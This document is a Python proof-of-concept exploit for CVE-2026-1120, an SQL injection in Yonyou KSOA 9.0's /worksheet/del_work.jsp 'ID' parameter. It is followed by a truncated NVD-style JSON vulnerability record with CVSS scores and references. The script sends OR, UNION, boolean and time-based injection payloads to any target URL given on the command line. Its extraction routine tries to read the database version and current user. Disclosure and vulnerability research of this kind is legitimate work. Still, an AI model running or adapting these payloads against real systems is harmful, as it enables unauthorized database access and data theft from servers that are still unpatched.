CVE-2026-1120

# CVE-2026-1120 SQL Injection PoC for Yonyou KSOA 9.0 # Target: /worksheet/del_work.jsp # Parameter: ID import requests import sys def test_sql_injection(url): """ Test for SQL injection vulnerability in Yonyou KSOA del_work.jsp """ target_url = f"{url}/worksheet/del_work.jsp" # Normal request (baseline) normal_params = {'ID': '1'} # SQL injection test payloads payloads = [ "1' OR '1'='1", # Basic OR injection "1' UNION SELECT 1--", # UNION-based injection "1' AND 1=1--", # Boolean-based true condition "1' AND 1=2--", # Boolean-based false condition "1'; WAITFOR DELAY '0:0:5'--" # Time-based blind injection ] print(f"[*] Testing target: {target_url}") print(f"[*] Baseline request: {normal_params}") try: # Test baseline response = requests.get(target_url, params=normal_params, timeout=10) baseline_status = response.status_code print(f"[+] Baseline status code: {baseline_status}") # Test payloads for i, payload in enumerate(payloads, 1): test_params = {'ID': payload} print(f"\n[*] Test {i}/5: Testing payload: {payload}") try: response = requests.get(target_url, params=test_params, timeout=15) print(f"[+] Status code: {response.status_code}") # Check for SQL error indicators if 'sql' in response.text.lower() or 'error' in response.text.lower(): print(f"[!] Potential SQL error detected!") # Check response time for time-based injection if 'WAITFOR' in payload and response.elapsed.total_seconds() > 4: print(f"[!] Time-based injection confirmed! Response time: {response.elapsed.total_seconds()}s") except requests.exceptions.Timeout: print(f"[!] Request timeout - possible time-based injection") except Exception as e: print(f"[-] Error: {str(e)}") except Exception as e: print(f"[-] Fatal error: {str(e)}") return False return True def extract_data(url): """ Extract database information using UNION-based injection """ target_url = f"{url}/worksheet/del_work.jsp" # Database version extraction version_payload = "1' UNION SELECT @@version--" print(f"\n[*] Extracting database version...") try: response = requests.get(target_url, params={'ID': version_payload}, timeout=10) if '5.' in response.text or '8.' in response.text: print(f"[+] Database version info found in response") except: pass # User extraction user_payload = "1' UNION SELECT user()--" print(f"[*] Extracting current database user...") try: response = requests.get(target_url, params={'ID': user_payload}, timeout=10) except: pass if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-1120.py <target_url>") print("Example: python cve-2026-1120.py http://vulnerable-server:8080") sys.exit(1) target = sys.argv[1].rstrip('/') test_sql_injection(target)

{"cve": {"id": "CVE-2026-1120", "sourceIdentifier": "[email protected]", "published": "2026-01-18T14:16:16.387", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /worksheet/del_work.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad ha sido encontrada en Yonyou KSOA 9.0. El elemento afectado es una función desconocida del archivo /worksheet/del_work.jsp del componente HTTP GET Parameter Handler. La manipulación del argumento ID conduce a inyección SQL. El ataque puede ser iniciado remotamente. El exploit ha sido divulgado al público y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "16092315-0438-4B91-A293-8CE177EAD656"}]}]}], "references": [{"url": "https://github.com/LX-66-LX/cve/issues/6", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://vuldb.com/?ctiid.341712", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341712", "source": "[email protected]", "tags": ["Third Party Advisory", " ... (truncated)